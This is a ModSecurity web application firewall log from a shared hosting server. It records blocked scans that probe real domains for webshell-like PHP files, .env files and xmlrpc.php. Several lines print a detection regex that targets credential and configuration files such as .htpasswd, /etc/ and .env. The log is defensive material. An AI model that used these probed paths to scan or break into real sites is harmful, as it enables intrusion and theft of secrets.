[Tue May 26 13:51:13.400609 2026] [security2:error] [pid 560287:tid 560550] [client 185.192.71.226:60027] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 226.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/update/f35.php"] [unique_id "ahVX-ZmX5s6sDS3wJVcWqgAAAQI"]
[Tue May 26 13:51:13.830866 2026] [security2:error] [pid 560287:tid 560475] [client 15.235.169.50:50801] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/.well-known/pki-validation/defaults.php"] [unique_id "ahVX-ZmX5s6sDS3wJVcWuQAAALs"]
[Tue May 26 13:51:14.131172 2026] [security2:error] [pid 555743:tid 555936] [client 185.92.25.107:40137] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-content/hello.php"] [unique_id "ahVX-sjqAquC0YaxQjC3DgAAAUk"]
[Tue May 26 13:51:14.300203 2026] [security2:error] [pid 560287:tid 560541] [client 15.235.169.50:50881] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/images/autoload_classmap.php"] [unique_id "ahVX-pmX5s6sDS3wJVcWxAAAAPk"]
[Tue May 26 13:51:14.549739 2026] [security2:error] [pid 555743:tid 555931] [client 207.241.173.79:25316] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bh-cp-1.host.in"] [uri "/backend/.env"] [unique_id "ahVX-sjqAquC0YaxQjC3FAAAAUQ"]
[Tue May 26 13:51:14.549771 2026] [security2:error] [pid 560287:tid 560540] [client 207.241.173.79:25306] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bh-cp-1.host.in"] [uri "/app/.env"] [unique_id "ahVX-pmX5s6sDS3wJVcWyAAAAPg"]
[Tue May 26 13:51:14.550237 2026] [security2:error] [pid 555743:tid 555980] [client 207.241.173.79:25314] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bh-cp-1.host.in"] [uri "/api/.env"] [unique_id "ahVX-sjqAquC0YaxQjC3FQAAAXU"]
[Tue May 26 13:51:14.787512 2026] [security2:error] [pid 560287:tid 560527] [client 15.235.169.50:50954] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-includes/rest-api/NzY6AS.php"] [unique_id "ahVX-pmX5s6sDS3wJVcW5QAAAO0"]
[Tue May 26 13:51:14.890328 2026] [security2:error] [pid 560287:tid 560462] [client 20.151.111.128:3472] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/plugins/content/apismtp/apismtp.php"] [unique_id "ahVX-pmX5s6sDS3wJVcW5gAAAK8"]
[Tue May 26 13:51:14.946413 2026] [security2:error] [pid 560287:tid 560433] [client 20.196.127.68:13264] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.juniorwoodies.com"] [uri "/elp.php"] [unique_id "ahVX-pmX5s6sDS3wJVcW6QAAAJQ"]
[Tue May 26 13:51:15.093006 2026] [security2:error] [pid 560287:tid 560531] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVX-pmX5s6sDS3wJVcW4AAAAPE"]
[Tue May 26 13:51:15.240212 2026] [security2:error] [pid 560287:tid 560450] [client 20.151.111.128:3984] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/vwowqaab.php"] [unique_id "ahVX-5mX5s6sDS3wJVcW-gAAAKQ"], referer: www.google.com
[Tue May 26 13:51:15.273067 2026] [security2:error] [pid 560287:tid 560460] [client 15.235.169.50:51014] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/css/index.php"] [unique_id "ahVX-5mX5s6sDS3wJVcW-wAAAK0"]
[Tue May 26 13:51:15.603467 2026] [security2:error] [pid 560287:tid 560478] [client 20.196.127.68:13963] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.juniorwoodies.com"] [uri "/Exception-class.php"] [unique_id "ahVX-5mX5s6sDS3wJVcXAQAAAL4"]
[Tue May 26 13:51:15.763453 2026] [security2:error] [pid 555743:tid 555967] [client 15.235.169.50:51120] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/indo.php"] [unique_id "ahVX-8jqAquC0YaxQjC3IgAAAWg"]
[Tue May 26 13:51:16.234299 2026] [security2:error] [pid 560287:tid 560549] [client 15.235.169.50:51185] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/js/about.php"] [unique_id "ahVX_JmX5s6sDS3wJVcXDgAAAQE"]
[Tue May 26 13:51:16.252854 2026] [security2:error] [pid 560287:tid 560469] [client 20.196.127.68:13309] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.juniorwoodies.com"] [uri "/ee.php"] [unique_id "ahVX_JmX5s6sDS3wJVcXDwAAALU"]
[Tue May 26 13:51:16.588605 2026] [security2:error] [pid 560287:tid 560481] [client 91.230.225.168:42289] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.225.230.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-admin/maint/bootstrap.php"] [unique_id "ahVX_JmX5s6sDS3wJVcXGAAAAMA"]
[Tue May 26 13:51:16.700011 2026] [security2:error] [pid 560287:tid 560550] [client 15.235.169.50:51263] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/crop.php"] [unique_id "ahVX_JmX5s6sDS3wJVcXIAAAAQI"]
[Tue May 26 13:51:16.892180 2026] [security2:error] [pid 555743:tid 555933] [client 20.196.127.68:13281] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.juniorwoodies.com"] [uri "/edit.php"] [unique_id "ahVX_MjqAquC0YaxQjC3MQAAAUY"]
[Tue May 26 13:51:16.987446 2026] [security2:error] [pid 560287:tid 560547] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVX_JmX5s6sDS3wJVcXHQAAAP8"]
[Tue May 26 13:51:17.053985 2026] [security2:error] [pid 555743:tid 555972] [client 20.151.111.128:3974] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahVX_cjqAquC0YaxQjC3VAAAAW0"], referer: www.google.com
[Tue May 26 13:51:17.166683 2026] [security2:error] [pid 555743:tid 555975] [client 15.235.169.50:51335] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-admin/admin.php"] [unique_id "ahVX_cjqAquC0YaxQjC3WQAAAXA"]
[Tue May 26 13:51:17.328748 2026] [security2:error] [pid 555743:tid 555996] [client 185.92.25.104:48931] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/themes/zMousse/otuz1.php"] [unique_id "ahVX_cjqAquC0YaxQjC3XAAAAYU"]
[Tue May 26 13:51:17.534634 2026] [security2:error] [pid 560287:tid 560502] [client 20.196.127.68:13992] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.juniorwoodies.com"] [uri "/f35.php"] [unique_id "ahVX_ZmX5s6sDS3wJVcXLQAAANQ"]
[Tue May 26 13:51:17.642437 2026] [security2:error] [pid 555743:tid 555964] [client 15.235.169.50:51404] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/991176.php"] [unique_id "ahVX_cjqAquC0YaxQjC3YwAAAWU"]
[Tue May 26 13:51:17.782435 2026] [security2:error] [pid 555743:tid 555880] [client 185.92.25.136:29791] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 136.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-content/edit-wolf.php"] [unique_id "ahVX_cjqAquC0YaxQjC3ZAAAARE"]
[Tue May 26 13:51:17.939350 2026] [security2:error] [pid 555743:tid 555997] [client 20.151.111.128:4024] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "canopykaapi.com"] [uri "/index.php"] [unique_id "ahVX_MjqAquC0YaxQjC3MwAAAYY"], referer: www.google.com
[Tue May 26 13:51:18.133481 2026] [security2:error] [pid 560287:tid 560427] [client 15.235.169.50:51479] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/cong.php"] [unique_id "ahVX_pmX5s6sDS3wJVcXOQAAAI4"]
[Tue May 26 13:51:18.157409 2026] [security2:error] [pid 555743:tid 555898] [client 20.196.127.68:13980] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.juniorwoodies.com"] [uri "/fff.php"] [unique_id "ahVX_sjqAquC0YaxQjC3awAAASM"]
[Tue May 26 13:51:18.211040 2026] [security2:error] [pid 560287:tid 560535] [client 20.151.111.128:4020] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-content/plugins/apikey/apikey.php.suspected"] [unique_id "ahVX_pmX5s6sDS3wJVcXOgAAAPU"]
[Tue May 26 13:51:18.539067 2026] [security2:error] [pid 555743:tid 555977] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVX_sjqAquC0YaxQjC3agAAAXI"]
[Tue May 26 13:51:18.609137 2026] [security2:error] [pid 560287:tid 560524] [client 20.151.111.128:3991] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-plain.php"] [unique_id "ahVX_pmX5s6sDS3wJVcXRAAAAOo"], referer: www.google.com
[Tue May 26 13:51:18.631841 2026] [security2:error] [pid 560287:tid 560549] [client 15.235.169.50:51545] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-admin/js/index.php"] [unique_id "ahVX_pmX5s6sDS3wJVcXRQAAAQE"]
[Tue May 26 13:51:18.745100 2026] [security2:error] [pid 560287:tid 560467] [client 20.196.127.68:14007] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.juniorwoodies.com"] [uri "/ff1.php"] [unique_id "ahVX_pmX5s6sDS3wJVcXSAAAALQ"]
[Tue May 26 13:51:19.110376 2026] [security2:error] [pid 560287:tid 560499] [client 15.235.169.50:51649] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/js/autoload_classmap.php"] [unique_id "ahVX_5mX5s6sDS3wJVcXSwAAANI"]
[Tue May 26 13:51:19.210685 2026] [security2:error] [pid 555743:tid 555910] [client 185.192.71.232:52295] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-content/plugins/ubh/up.php"] [unique_id "ahVX_8jqAquC0YaxQjC3dAAAAS8"]
[Tue May 26 13:51:19.400210 2026] [security2:error] [pid 555743:tid 555936] [client 20.196.127.68:14967] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.juniorwoodies.com"] [uri "/flower.php"] [unique_id "ahVX_8jqAquC0YaxQjC3eAAAAUk"]
[Tue May 26 13:51:19.604077 2026] [security2:error] [pid 555743:tid 555882] [client 15.235.169.50:51710] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/images/func.php_"] [unique_id "ahVX_8jqAquC0YaxQjC3egAAARM"]
[Tue May 26 13:51:19.607507 2026] [security2:error] [pid 555743:tid 555947] [client 185.92.25.101:58909] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 101.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-admin/images/bootstrap.php"] [unique_id "ahVX_8jqAquC0YaxQjC3ewAAAVQ"]
[Tue May 26 13:51:20.017765 2026] [security2:error] [pid 555743:tid 555987] [client 20.196.127.68:17490] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.juniorwoodies.com"] [uri "/file.php"] [unique_id "ahVYAMjqAquC0YaxQjC3gwAAAXw"]
[Tue May 26 13:51:20.030891 2026] [security2:error] [pid 560287:tid 560527] [client 185.192.71.241:55543] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 241.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/images/upload.php"] [unique_id "ahVYAJmX5s6sDS3wJVcXZQAAAO0"]
[Tue May 26 13:51:20.062609 2026] [security2:error] [pid 560287:tid 560513] [client 15.235.169.50:51781] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/.well-known/pki-validation/doc.php"] [unique_id "ahVYAJmX5s6sDS3wJVcXZgAAAN8"]
[Tue May 26 13:51:20.388274 2026] [security2:error] [pid 560287:tid 560547] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVX_5mX5s6sDS3wJVcXYQAAAP8"]
[Tue May 26 13:51:20.535373 2026] [security2:error] [pid 560287:tid 560455] [client 15.235.169.50:51840] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-includes/css/index.php"] [unique_id "ahVYAJmX5s6sDS3wJVcXcgAAAKg"]
[Tue May 26 13:51:20.609982 2026] [security2:error] [pid 560287:tid 560526] [client 20.196.127.68:13520] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.juniorwoodies.com"] [uri "/goods.php"] [unique_id "ahVYAJmX5s6sDS3wJVcXeQAAAOw"]
[Tue May 26 13:51:21.041996 2026] [security2:error] [pid 560287:tid 560522] [client 15.235.169.50:51925] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-admin/maint/index.php"] [unique_id "ahVYAZmX5s6sDS3wJVcXgwAAAOg"]
[Tue May 26 13:51:21.168444 2026] [security2:error] [pid 560287:tid 560505] [client 129.222.147.134:65416] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVYAZmX5s6sDS3wJVcXhgAAANc"]
[Tue May 26 13:51:21.178592 2026] [security2:error] [pid 560287:tid 560505] [client 129.222.147.134:65416] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVYAZmX5s6sDS3wJVcXhgAAANc"]
[Tue May 26 13:51:21.214430 2026] [security2:error] [pid 560287:tid 560498] [client 20.196.127.68:17517] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.juniorwoodies.com"] [uri "/g.php"] [unique_id "ahVYAZmX5s6sDS3wJVcXhwAAANE"]
[Tue May 26 13:51:21.280051 2026] [security2:error] [pid 560287:tid 560452] [client 106.192.248.115:50465] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVYAZmX5s6sDS3wJVcXiQAAAKY"]
[Tue May 26 13:51:21.280207 2026] [security2:error] [pid 560287:tid 560452] [client 106.192.248.115:50465] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVYAZmX5s6sDS3wJVcXiQAAAKY"]
[Tue May 26 13:51:21.521154 2026] [security2:error] [pid 560287:tid 560440] [client 15.235.169.50:51994] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-content/admin.php"] [unique_id "ahVYAZmX5s6sDS3wJVcXkgAAAJs"]
[Tue May 26 13:51:21.687818 2026] [security2:error] [pid 560287:tid 560548] [client 185.92.25.100:40213] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 100.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-content/plugins/seoplugins/db.php"] [unique_id "ahVYAZmX5s6sDS3wJVcXmAAAAQA"]
[Tue May 26 13:51:21.881819 2026] [security2:error] [pid 560287:tid 560527] [client 20.196.127.68:17484] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.juniorwoodies.com"] [uri "/hplfuns.php"] [unique_id "ahVYAZmX5s6sDS3wJVcXngAAAO0"]
[Tue May 26 13:51:22.022151 2026] [security2:error] [pid 560287:tid 560492] [client 15.235.169.50:52070] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/lv.php"] [unique_id "ahVYApmX5s6sDS3wJVcXnwAAAMs"]
[Tue May 26 13:51:22.136713 2026] [security2:error] [pid 555743:tid 555957] [client 185.192.71.235:38849] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-content/themes/pridmag/db.php"] [unique_id "ahVYAsjqAquC0YaxQjC3jgAAAV4"]
[Tue May 26 13:51:22.234145 2026] [security2:error] [pid 560287:tid 560447] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYAZmX5s6sDS3wJVcXnQAAAKE"]
[Tue May 26 13:51:22.487842 2026] [security2:error] [pid 555743:tid 555930] [client 91.230.225.172:29315] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 172.225.230.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-content/plugins/linkpreview/db.php"] [unique_id "ahVYAsjqAquC0YaxQjC3kAAAAUM"]
[Tue May 26 13:51:22.499739 2026] [security2:error] [pid 560287:tid 560449] [client 15.235.169.50:52143] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-includes/sitemaps/about.php"] [unique_id "ahVYApmX5s6sDS3wJVcXqwAAAKM"]
